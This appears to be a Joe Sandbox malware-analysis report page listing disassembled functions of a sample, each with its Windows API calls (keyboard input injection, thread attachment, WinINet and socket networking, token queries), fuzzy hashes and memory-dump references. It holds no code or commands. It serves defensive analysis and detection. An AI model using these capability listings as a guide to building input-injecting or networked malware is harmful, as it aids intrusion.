Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 76cf6ec832c1029be29035756283361203ea9d725def1ac4a0c6fb5d53471afd
Instruction ID: 7dd71c397b5e0132559606b189f6a95e1f7b6dda54d78c5e8e4a4aae875c0b82
Opcode Fuzzy Hash: 76cf6ec832c1029be29035756283361203ea9d725def1ac4a0c6fb5d53471afd
Instruction Fuzzy Hash: 48416DB4A00259DFCB11EF58D884BA97BF7FB4A350F1882A9E4159F290D730E945CB60

Function 00663A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00663AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00663AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00663B34
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00663B92

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: f58ced88dc15c185b67cf9aa008dfedf53d63a59754933bcdff984a0e8ea875d
Instruction ID: 77c71ce2c1c1b7bc148d7657ce503f6433782eed44d425384d4c6be19b9da928
Opcode Fuzzy Hash: f58ced88dc15c185b67cf9aa008dfedf53d63a59754933bcdff984a0e8ea875d
Instruction Fuzzy Hash: 1331F470E00268AEFF219B64C819BFE7BAB9B66310F04015AE482933D1C7759F45D7A5

Function 00654004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00654038
__isleadbyte_l.LIBCMT ref: 00654066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00654094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 006540CA

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: becf3a8a874e47a5b9092aa7e780b36e5695ee6a66ae509eb4864f9d67d77837
Instruction ID: c2ede3e8b9bb54f85f4af15d21b02e59636fe801a9cd32267c38639993315ef9
Opcode Fuzzy Hash: becf3a8a874e47a5b9092aa7e780b36e5695ee6a66ae509eb4864f9d67d77837
Instruction Fuzzy Hash: 6B31C330504206AFDB219F75C844BAA7BA7FF41316F2540A8EA518B2D0DB31D8D5DB90

Function 00687CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00687CB9

Part of subcall function 00665F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00665F6F
Part of subcall function 00665F55: GetCurrentThreadId.KERNEL32 ref: 00665F76
Part of subcall function 00665F55: AttachThreadInput.USER32(00000000,?,0066781F), ref: 00665F7D

GetCaretPos.USER32(?), ref: 00687CCA
ClientToScreen.USER32(00000000,?), ref: 00687D03
GetForegroundWindow.USER32 ref: 00687D09

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 406631fe99d43797590720315a1411f5e1a8e2b5f9099d087c20006aaa5e7d2d
Instruction ID: b525a7a12dd9510797c1b81e292d8e7008206b80e4d7050743300475482bfbc9
Opcode Fuzzy Hash: 406631fe99d43797590720315a1411f5e1a8e2b5f9099d087c20006aaa5e7d2d
Instruction Fuzzy Hash: EB312F71900108AFDB40EFA5C8459EFBBFAEF58310F10946AF815E3211DA31AE058FA4

Function 0068F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F

GetCursorPos.USER32(?), ref: 0068F211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0069E4C0,?,?,?,?,?), ref: 0068F226
GetCursorPos.USER32(?), ref: 0068F270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0069E4C0,?,?,?), ref: 0068F2A6

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: f55ec48a05491f038c648121e0b4bae257c1327966e52ff3fbcef1bfb81189e0
Instruction ID: bbefbb6b309c2694a3ea4110f6a54738e97c06a89aaa92a3e7c984a6a57d6829
Opcode Fuzzy Hash: f55ec48a05491f038c648121e0b4bae257c1327966e52ff3fbcef1bfb81189e0
Instruction Fuzzy Hash: 04219139601118AFCB15AF94C868EEEBBB7EF0A710F044169F9054B2A1D7319E51DBA0

Function 0067431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00674358

Part of subcall function 006743E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00674401
Part of subcall function 006743E2: InternetCloseHandle.WININET(00000000), ref: 0067449E

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 3a28ee50eb8683d87c9ae35f6664af4ae4d2b8aa5057e1663932d09681fe67a5
Instruction ID: a94f2f1710713b55fb63feb49e37086548729ac295e661d9987c870bf9e2b1ba
Opcode Fuzzy Hash: 3a28ee50eb8683d87c9ae35f6664af4ae4d2b8aa5057e1663932d09681fe67a5
Instruction Fuzzy Hash: A221D131200601BBEB159F619C04FBBB7ABFF44720F10811EBA1E96690DF71E8219B90

Function 00678A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00678AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00678AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 00678AFF
WSAGetLastError.WSOCK32(00000000), ref: 00678B16

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 7f2b06b210ee1204935d9f64878ff1202238fbac499d0396e8b6520ea9e54ef9
Instruction ID: 715254feb141ceb680af10da7a31cb6a90b38ddfce07a76afba3010455c23712
Opcode Fuzzy Hash: 7f2b06b210ee1204935d9f64878ff1202238fbac499d0396e8b6520ea9e54ef9
Instruction Fuzzy Hash: 6B21C372A001249FC7549F68C884ADEBBEDEF4A710F00816AF84AD7291DB74EE418F90

Function 00688A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00688AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00688AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00688ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00688ADC

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 457912e879c37996e5301972598a13f1956d2ec36fd1da2fd22d435b50609f08
Instruction ID: 02b8071ff31cd37fd5aabc56ac65041653bc2bcc9fe2d6e798c08ec397d4345d
Opcode Fuzzy Hash: 457912e879c37996e5301972598a13f1956d2ec36fd1da2fd22d435b50609f08
Instruction Fuzzy Hash: 95118E31245521AFDB58BB18DC15FBA779BEF8A320F144219F916C72E2CB74BD018B94

Function 00660AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00661E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00660ABB,?,?,?,0066187A,00000000,000000EF,00000119,?,?), ref: 00661E77
Part of subcall function 00661E68: lstrcpyW.KERNEL32(00000000,?,?,00660ABB,?,?,?,0066187A,00000000,000000EF,00000119,?,?,00000000), ref: 00661E9D
Part of subcall function 00661E68: lstrcmpiW.KERNEL32(00000000,?,00660ABB,?,?,?,0066187A,00000000,000000EF,00000119,?,?), ref: 00661ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0066187A,00000000,000000EF,00000119,?,?,00000000), ref: 00660AD4
lstrcpyW.KERNEL32(00000000,?,?,0066187A,00000000,000000EF,00000119,?,?,00000000), ref: 00660AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,0066187A,00000000,000000EF,00000119,?,?,00000000), ref: 00660B2E

Strings

cdecl, xrefs: 00660B25

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 894ab5acf8cfbb0b1eccd93507571623ba5cbf607f42ee771715f0270c62b2b7
Instruction ID: 6fd78201d884b35cf37ba7d3629546d063cb431a64dd29f8587cf3ea7f08fcc4
Opcode Fuzzy Hash: 894ab5acf8cfbb0b1eccd93507571623ba5cbf607f42ee771715f0270c62b2b7
Instruction Fuzzy Hash: B511963A200305AFDB25AF24DC45D7A77AAFF56354F80807AE906CB250EB72D851D7E4

Function 00652F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00652FB5

Part of subcall function 0064395C: __FF_MSGBANNER.LIBCMT ref: 00643973
Part of subcall function 0064395C: __NMSG_WRITE.LIBCMT ref: 0064397A
Part of subcall function 0064395C: RtlAllocateHeap.NTDLL(01260000,00000000,00000001,00000001,00000000,?,?,0063F507,?,0000000E), ref: 0064399F

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: d30d671c6b8cd2c54868e0685abd0f4e71eba7f0e6c398d4a6feeeea80c62b67
Instruction ID: d3976f804f20670408c19d6e9f4b2ca6b0efc73255842ebfa5a9bdf4c6271949
Opcode Fuzzy Hash: d30d671c6b8cd2c54868e0685abd0f4e71eba7f0e6c398d4a6feeeea80c62b67
Instruction Fuzzy Hash: FF110D31548322EFDF313FB0AC546A93B97AF067A1F204419FC499A391DB34C9458B94

Function 0066058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 006605AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 006605C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006605DD
FreeLibrary.KERNEL32(?), ref: 00660632

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: ccc0b6b900fcfecd825fe674d0a0a037631ead69ce6b57b37521a1d9ccc7d190
Instruction ID: 86f3d6e29d84d702ec2389e593171ea2fddada36382e6baec5aa6e85271d7130
Opcode Fuzzy Hash: ccc0b6b900fcfecd825fe674d0a0a037631ead69ce6b57b37521a1d9ccc7d190
Instruction Fuzzy Hash: B0216771900209FBEB209F91DC98ADBBBBAEF80700F00847AE516D6150DBB0EA55DF60

Function 00666713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00666733
_memset.LIBCMT ref: 00666754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 006667A6
CloseHandle.KERNEL32(00000000), ref: 006667AF

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 607d18aa0b32c01c99a0a10f31de36756d2a933796640ee1e8d89df5f4be9ac8
Instruction ID: b11200d3e823c7567a8c252fb23d839fb7c62561028d7a6db00a01f8bffc5a5b
Opcode Fuzzy Hash: 607d18aa0b32c01c99a0a10f31de36756d2a933796640ee1e8d89df5f4be9ac8
Instruction Fuzzy Hash: 521106769012287AE720ABA5AC4DFEBBABCEF45764F10419AF505E71C0D2705F80CBA4

Function 0065B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0065AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0065AA79
Part of subcall function 0065AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0065AA83
Part of subcall function 0065AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0065AA92
Part of subcall function 0065AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0065AA99
Part of subcall function 0065AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0065AAAF

GetLengthSid.ADVAPI32(?,00000000,0065ADE4,?,?), ref: 0065B21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0065B227
HeapAlloc.KERNEL32(00000000), ref: 0065B22E
CopySid.ADVAPI32(?,00000000,?), ref: 0065B247

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: 30669446b5c340f3077336124d896615585c9e92fbc71190c71fe04834149039
Instruction ID: 2617770632a9250ef3609acb66e0bd80a58d024b3aa6f3d5de26dd6e1715ccd3
Opcode Fuzzy Hash: 30669446b5c340f3077336124d896615585c9e92fbc71190c71fe04834149039
Instruction Fuzzy Hash: 5B119171A00205EFDB049F98DC85ABEB7AAEF85305F14A02DE94397350D731AE48CB20

Function 0065B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 0065B498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0065B4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0065B4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0065B4DB

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 62dc089feb45561d51716f904ff2a2c19e5adaada039573d046a810e57ebb311
Instruction ID: 7bcc18fcfdbda6283eb8a8272aa08b2b45a64fbe7f0ddf7b6262808371cc7dac
Opcode Fuzzy Hash: 62dc089feb45561d51716f904ff2a2c19e5adaada039573d046a810e57ebb311
Instruction Fuzzy Hash: 8F115A7A900218FFDB21DFA8C881EDDBBB5FB08700F204091EA04B7294D771AE11DB94

Function 0063B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0063B5A5
GetClientRect.USER32(?,?), ref: 0069E69A
GetCursorPos.USER32(?), ref: 0069E6A4
ScreenToClient.USER32(?,?), ref: 0069E6AF

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 80b795030f2c1203dceaf2647739d2c6d37ab44e98b04520b8fcacfdec74192a
Instruction ID: 252199648b11bd9fe4d06f4b8fb5887459c3672e01cba772a980c9b676d625a3
Opcode Fuzzy Hash: 80b795030f2c1203dceaf2647739d2c6d37ab44e98b04520b8fcacfdec74192a
Instruction Fuzzy Hash: 34113671A00129BBCB10EF94C8858EE7BBAEB0A314F001455FA02E7640D330BA82CBA5

Function 0066732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00667352
MessageBoxW.USER32(?,?,?,?), ref: 00667385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0066739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006673A2

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 6731e6613d27b071369dcf95bf7832d5236ca5d5b6fbcbd9bfa8ad608b6e47b1
Instruction ID: 70e1289101bddd44e4978844f1f14099c5fd7c430060591eca35e7c004ae6438
Opcode Fuzzy Hash: 6731e6613d27b071369dcf95bf7832d5236ca5d5b6fbcbd9bfa8ad608b6e47b1
Instruction Fuzzy Hash: 7C110872A04254BFC7019B68DC49ADE7BAF9B45314F144315F921E3351D6709E008BA0

Function 0063D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0063D1BA
GetStockObject.GDI32(00000011), ref: 0063D1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 0063D1D8

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 33a3e85611a44241c2852599baa111894f97fc06895dac61d1b16d63c50787a9
Instruction ID: 375527f5c9a12b189c02ca8e72060402f9a9936e7d82d941f4b3988f2daf1c92
Opcode Fuzzy Hash: 33a3e85611a44241c2852599baa111894f97fc06895dac61d1b16d63c50787a9
Instruction Fuzzy Hash: CA11AD72501509BFEF125F90AC50EEABB6FFF093A4F041106FA0552150C732ED61ABE0

Function 00654DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00654E16

Part of subcall function 006554F5: __fltout2.LIBCMT ref: 0065551E

__cftog_l.LIBCMT ref: 00654E3C
__cftoe_l.LIBCMT ref: 00654E6E

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
